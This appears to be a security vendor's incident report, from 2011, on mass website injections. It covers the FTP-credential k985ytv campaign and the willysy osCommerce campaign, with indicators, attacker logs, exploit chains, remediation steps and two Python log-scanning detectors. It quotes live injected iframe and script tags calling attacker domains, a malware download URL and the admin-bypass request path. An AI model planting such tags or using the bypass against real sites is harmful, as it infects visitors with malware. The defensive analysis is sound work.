2. Number of infected websites: We estimate at least 22,400 unique DOMAINS. The attackers' first attempt was not successful and therefore Google indexed more than 536,000 infected pages. However, since then the attackers have fixed the injected pattern, so the injected script is executed rather than displayed. Google therefore no longer indexes infected websites.
3. Injected scripts:
Initially (no <script> tag and therefore indexed by Google):
Full text of above is here on pastebin.
Later, it quickly became one of the following (with <script> tag and therefore works):
Full text of above is here on pastebin.
Full text of above is here on pastebin.
4. Browser Exploitation: Drive-by download script served by a modified version of the BlackHole exploit pack.
5. Malware: Fake antivirus, different names in different OS: "XP Security 2012" under Windows XP, "Vista Antivirus 2012" under Windows Vista, and "Win 7 Antivirus 2012" under Windows 7.
6. Injection method: Primarily via stolen FTP credentials; an automated program then logs in over FTP, retrieves files, injects the iframe, and uploads them back. FTP credentials are stolen from personal Windows computers that have been infected with malware. The malware searches the stored password files of FTP clients and also sniffs FTP traffic. Stolen credentials are sent back to the attackers.
7. Malicious domains and IPs:
Redirectors:
1. hysofufewobe.com (ex: http://hysofufewobe.com/k985ytv.htm)
2. zirycatum.com (ex: http://zirycatum.com/k985ytv.htm)
3. numudozaf.com (ex: http://numudozaf.com/k985ytv.htm)
All of the above resolve to the same Moldovan IP (south of Ukraine): 178.17.163.92, registered under the name "Alexandr S Grebennikov" on July 25.
Exploit servers:
1. jbvnhw.com (ex: http://jbvnhw.com/i87yta.htm)
2. mlvurp.com (ex: http://mlvurp.com/i87yta.htm)
3. rprlpb.com (ex: http://rprlpb.com/i87yta.htm)
4. efnxkg.com (ex: http://efnxkg.com/i87yta.htm)
All resolve to the US IP 69.50.202.74 (AS18866), belonging to Atjeu Website Hosting. All exploit domains were registered under the name "Alardo Macias" on August 14.
8. Antivirus detection rate: Currently 5 out of 43 on VirusTotal:
[2. The visitor infection process]
To show how visitors are infected and how we can analyze the infection, we've made the following video:
[3. The fake antivirus being spread]
The Fake AV displays different names in different OS: "XP Security 2012" under Windows XP, "Vista Antivirus 2012" under Windows Vista, and "Win 7 Antivirus 2012" under Windows 7. Below are some screenshots:
[4. Sample FTP logs of infected websites]
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "LIST /example.com/ftp/" 226 11862
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "TYPE I" 200 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "PASV" 227 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "SIZE index.htm" 213 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "RETR index.htm" 226 12573
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "TYPE I" 200 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "PASV" 227 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "STOR index.htm" 226 13018
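The transfer log above shows the signature of the injection step: the same account retrieves index.htm and seconds later stores a slightly larger copy. As an added example (not part of the post and not Armorize's tooling), the Python below parses log lines in that format and flags any RETR followed by a larger STOR of the same file from the same client and account; the sample input is the quoted lines plus one constructed benign upload.

```python
"""Flag the FTP "retrieve, modify, re-upload" pattern seen in the k985ytv logs.

Added example (not the blog's own tooling): parses FTP transfer log lines in
the format shown in the post and reports any RETR of a file that is followed,
from the same client IP and account, by a STOR of the same file within a
short window where the stored copy is larger than the retrieved one. That
growth is what an injected iframe/script tag looks like in a transfer log.
"""
import re
from datetime import datetime, timedelta

# Line format as it appears in the post: client ip, "UNKNOWN", account,
# [timestamp], "command args", reply code, bytes transferred ("-" if none).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<cmd>[A-Z]+)(?: (?P<arg>[^"]*))?" (?P<code>\d{3}) (?P<bytes>\S+)$'
)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["bytes"] = None if rec["bytes"] == "-" else int(rec["bytes"])
    return rec


def find_reupload_injections(lines, window_seconds=60):
    """Return a list of (ip, user, filename, retr_bytes, stor_bytes) tuples.

    A hit is a completed RETR (reply 226) followed by a completed STOR of the
    same path by the same ip/account within window_seconds, where the
    uploaded file is larger than the downloaded one.
    """
    window = timedelta(seconds=window_seconds)
    last_retr = {}  # (ip, user, filename) -> (timestamp, bytes)
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["code"] != "226" or rec["bytes"] is None:
            continue  # directory listings, PASV/TYPE chatter and failures are skipped
        key = (rec["ip"], rec["user"], rec["arg"])
        if rec["cmd"] == "RETR":
            last_retr[key] = (rec["ts"], rec["bytes"])
        elif rec["cmd"] == "STOR" and key in last_retr:
            retr_ts, retr_bytes = last_retr.pop(key)
            if rec["ts"] - retr_ts <= window and rec["bytes"] > retr_bytes:
                hits.append((rec["ip"], rec["user"], rec["arg"],
                             retr_bytes, rec["bytes"]))
    return hits


# Constructed sample: the lines quoted in the post plus a benign upload by a
# different account that never retrieved the file first.
SAMPLE_LOG = """\
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "LIST /example.com/ftp/" 226 11862
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "TYPE I" 200 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "PASV" 227 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "SIZE index.htm" 213 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "RETR index.htm" 226 12573
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "TYPE I" 200 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "PASV" 227 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "STOR index.htm" 226 13018
192.0.2.10 UNKNOWN webmaster [15/Aug/2011:09:02:11 -0500] "STOR news.htm" 226 4020
"""

if __name__ == "__main__":
    for ip, user, name, before, after in find_reupload_injections(SAMPLE_LOG.splitlines()):
        print(f"{ip} {user} re-uploaded {name}: {before} -> {after} bytes (+{after - before})")
```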
[5. Sample list of infected websites and screenshots of some of them]
Willysy osCommerce injection: Over 6 million infected pages (update: now over 8 million) and a new video with new tools to do the analysis
Posted by: Wayne Huang on 8.03.2011
Categories: Drive-by download, Mass Injection, osCommerce, Web malware
(update: infection numbers are now over 8 million, see original post for updates)
With the number of infected pages now over 6 million, we've again updated our initial report on this willysy mass injection incident. We've also included in it the following new video, in which we used an internal tool to help make the malware analysis process more clear:
Thank you so much to those of you who sent us information--IPs, logs, etc. Sorry, we're still analyzing them, but we will post a new update shortly!
willysy.com mass injection has hit more than 3.8 million pages (update: now > 8 million)
Posted by: Wayne Huang on 7.31.2011
Categories: Drive-by download, Hosting attack, Mass Injection, osCommerce, Web malware
(update: the infection number is over 6 million now as of Aug 3rd)
On July 24th, we published our initial report on this willysy mass injection incident, which at that time hit around 90,000 pages.
As of July 31st, Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages. Note this number is for individual infected pages, not sites or domains.
And so we've largely updated and reformatted (so new info appears at the front) the initial report, adding to it the infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more. Please go there and have a look, thanks!
willysy.com Mass Injection ongoing, over 8 million infected pages, targets osCommerce sites
Posted by: Chris on 7.25.2011
Categories: Drive-by download, HackAlert, Mass Injection, osCommerce, Web malware
(Credits: Wayne Huang, Chris Hsiao, NightCola Lin, Sun Huang, Crane Ku)
(Initial post: July 24th)
(Updated: July 30th with new infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more)
(Updated: Aug 3rd with new video and new infection count: >6 million)
(Updated: Aug 8th with new infection count: >8 million)
[Table of contents]
1. Summary
2. Attack Timeline
3. Source of Attack
4. Vulnerabilities Targeted
5. What Happens to Affected Websites
6. Remediation
7. Infection Details
8. Screenshots
[1. Summary]
1. Number of infections:
As of Aug 3rd, Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages. Note this number is for individual infected pages, not sites or domains.
2. Injected iframe:
initially it was:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
Later it became:
<script src=http://exero.eu/catalog/jquery.js></script>
3. Attacker:
Ukraine IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214 (all AS47694). Agent string: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
4. Target and website vulnerability:
osCommerce sites, using at least the following vulnerabilities: osCommerce Remote Edit Site Info Vulnerability, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass.
5. Browser exploits used:
CVE-2010-0840 -- Java Trust
CVE-2010-0188 -- PDF LibTiff
CVE-2010-0886 -- Java SMB
CVE-2006-0003 -- IE MDAC
CVE-2010-1885 -- HCP
6. Exploit domain:
arhyv.ru, counv.ru
Date of registration: July 20th
Registered by: leshkinaira@yahoo.com
IP: 46.16.240.18 (AS51632 Ukrain - Inet Ltd)
Related domains: xlamv.ru, vntum.ru
7. Malware URL:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[2. Attack Timeline]
July 10th -- "Angel Injection" writes about "osCommerce Remote Edit Site Info Vulnerability" (here, here).
July 11th -- Attacker group starts to test exploitation.
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com/admin/configuration.php/login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
July 20th -- Attacker registers the exploit domains arhyv.ru and counv.ru, using email: leshkinaira@yahoo.com
July 23rd -- Attack launched injects the "Store Name" variable:
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
Injected iframes pointed to two domains,
initially:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
and later:
<script src=http://exero.eu/catalog/jquery.js></script>
July 24th -- Initial writeup of this report; at the time there were only 90,000 infected pages:
July 31st -- Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages.
Bing, on the other hand, shows 1.8 million infected pages for willysy:
Aug 3rd -- Google shows more than 5,820,000 (willysy) + 497,000 (exero) = 6.3 million infected pages
Aug 7th -- Google shows more than 7,690,000 (willysy) + 629,000 (exero) = 8.3 million infected pages.
[3. Source of Attack]
Several IPs have been identified: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214, all of which belong to AS47694. These IPs appear to be located in Ukraine and belong to the ISP www.didan.com.ua.
The attackers used the following agent string:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
If you have logs or know other IPs that you can share, please send them to Wayne at email: wayne@armorize.com.
[4. Vulnerabilities Targeted]
This attack targets osCommerce websites and leverages several osCommerce vulnerabilities, including osCommerce Remote Edit Site Info Vulnerability, disclosed July 10th, 2011, osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability, disclosed May 14, 2011, and Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass, disclosed May 30, 2010.
Below are some sample log entries:
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.111 - - [23/Jul/2011:13:50:07 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 21883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
178.217.165.71 - - [23/Jul/2011:19:55:37 -0500] "GET /admin/configuration.php/login.php?cID=1&action=edit HTTP/1.1" 200 25014 "http://__Masked__by_armorize.com/admin/configuration.php?cID=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
[5. What Happens to Affected Websites]
1. The "Store Name" variable of osCommerce sites will be modified to inject one of the two tags below:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
2. For certain websites the attacker also leaves at least one (sometimes more) backdoor, or "webshell". This is especially common on shared hosting accounts, where the backdoor allows access to multiple accounts on the same server:
[6. Remediation]
Below is our best attempt to describe the remediation procedures. If you have questions or would like us to do it for you please contact wayne@armorize.com.
1. Know if you've been infected.
1.1 Search your logs for:
1.1.1 Access from IPs: 178.217.163.33, 178.217.165.111, 178.217.165.71, 178.217.163.214.
1.1.2 Access with agent string: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
1.2 Search your site for the existence of either of these two injected tags:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
1.3 Or just have HackAlert find everything for you. We know it's good because we built it ;) (greetings Dave, borrowed your quote)
2. Install an anti-virus program on the computer you use to manage your website.
3. Find and remove the injected backdoors.
4. Find and remove the injected iframes / javascripts.
5. Secure your osCommerce installation. Upgrade to the latest version and use .htaccess to protect admin directories.
6. Change your website hosting and your osCommerce admin passwords.
A very good article on how to secure osCommerce can be found here (thanks Markus):
http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/
And the latest version of osCommerce can be downloaded here:
http://www.oscommerce.com/solutions/downloads
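The log and content checks from steps 1.1 and 1.2, as an added example that is not Armorize's code: it parses Apache combined-format lines, flags the attacker IPs and user-agent listed above, and also flags any request that reaches admin scripts through the configuration.php/login.php path seen in the log excerpt, so it catches the same technique from source IPs not on the list. The sample log lines and the hostnames in them are constructed for the example.

```python
import re

# Indicators published in this write-up: attacker source IPs and User-Agent.
ATTACKER_IPS = {"178.217.163.33", "178.217.165.111", "178.217.165.71", "178.217.163.214"}
ATTACKER_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; "
               ".NET CLR 1.1.4322; Media Center PC 4.0)")
# Injected payloads from section 5: the hidden iframe and the fake jquery.js.
INJECTED_MARKERS = ("willysy.com/images/banners/", "exero.eu/catalog/jquery.js")
# Request shape from the logs: admin configuration.php reached via a login.php path suffix.
BYPASS_PATH = re.compile(r"/admin/configuration\.php/login\.php", re.I)

# Apache combined log: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')

# Constructed sample: one ordinary visitor, one line shaped like the excerpt above,
# and one request using the same path trick from an IP that is not on the list.
SAMPLE_LOG = [
    '203.0.113.9 - - [23/Jul/2011:13:49:58 -0500] "GET /catalog/index.php HTTP/1.1" '
    '200 8811 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/5.0"',
    '178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/'
    'login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "' + ATTACKER_UA + '"',
    '198.51.100.7 - - [23/Jul/2011:14:02:11 -0500] "GET /admin/configuration.php/'
    'login.php?cID=1&action=edit HTTP/1.1" 200 25014 "-" "Mozilla/5.0 (X11; Linux) Chrome/13"',
]

def scan_log_lines(lines):
    """Return one finding per suspicious line as (line_no, ip, reasons)."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not combined format; skip rather than guess
        reasons = []
        if m["ip"] in ATTACKER_IPS:
            reasons.append("known attacker IP")
        if m["ua"] == ATTACKER_UA:
            reasons.append("attacker user-agent")
        if BYPASS_PATH.search(m["req"]):
            reasons.append("admin config reached via login.php path suffix")
        if reasons:
            findings.append((n, m["ip"], reasons))
    return findings

def find_injections(content):
    """Step 1.2: return the injected markers present in a page or a config dump."""
    return [marker for marker in INJECTED_MARKERS if marker in content]

if __name__ == "__main__":
    for line_no, ip, reasons in scan_log_lines(SAMPLE_LOG):
        print(f"line {line_no} {ip}: {', '.join(reasons)}")
```

Run the same scanner over the real access log and over a dump of the osCommerce configuration table (the "Store Name" value) to cover both checks at once.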
[7. Infection Details]
Here's the original youtube video we made of the entire infection process; at the time there were only 90,000 infected pages.
And here's the new one we made when there were over 6 million infected pages:
1. Infected website is injected with one of the following scripts:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
2. Browser loads http://willysy.com/images/banners/, which redirects (302) to http://papucky.eu/ext/
3. The content of papucky.eu/ext/ is here on pastebin; it loads javascript from http://gooqlepics.com/include.js?in=864
4. That javascript is here on pastebin; it decodes to this and generates an iframe pointing to:
http://yandekapi.com/api?in=864
5. The content of http://yandekapi.com/api?in=864 is here; it redirects to: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV
6. The content of http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV is here and decodes to this. It includes multiple browser exploits.
7. After successful exploitation, the browser downloads and executes malware from here:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[8. Screenshots]
Vulnerable osCommerce installations allow modification of the site's variables without admin access:
When the injection does not execute, the injected iframe is rendered as literal content (rather than executed) in the title part of the website. Below are some examples: